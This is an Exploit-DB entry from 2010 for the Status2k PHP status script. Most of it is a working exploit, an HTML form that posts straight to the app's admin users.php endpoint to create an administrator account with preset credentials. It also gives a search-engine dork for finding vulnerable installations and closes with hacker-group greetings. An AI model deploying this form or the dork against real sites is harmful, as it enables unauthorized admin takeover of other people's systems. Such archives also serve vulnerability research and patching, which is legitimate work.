Status2k - Remote Add Admin

EDB-ID:

11258

CVE:



Author:

alnjm33

Type:

webapps


Platform:

PHP

Date:

2010-01-25


::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : status2k Remote Add Admin Exploit
Author: alnjm33
Software Link: it cost 24.95 / y
Script Site : http://www.status2k.com/buynow.html
Version: 1
Tested on: Version 1
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
( allinurl:dynamicimg.php )
================================Exploit=============================================

<html>
<title>status2k Remote Add Admin</title>

<body link="#00FF00" text="#008000" bgcolor="#000000">

<form method="POST" action="http://server/Status2k/admin/options/users.php">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">
<tr>
<td class="top">
<p align="center"><b>User & Pass : sec-war</b></p>
<p align="center"><b><font face="Comic Sans MS">
<a href="http://server/path//index.php?act=idx" style="text-decoration: none">
<font color="#00FF00">Security War</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input type="text" name="adminuser" size="30" value="sec-war"></td>
</tr>
<tr>
<td class="top">
<p align="center"><b>Password:</b></td>
</tr>
<tr>

<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="sec-war"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight: 700"></td>
</tr>
</form>
</table>
</html>
=======================================================================================
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members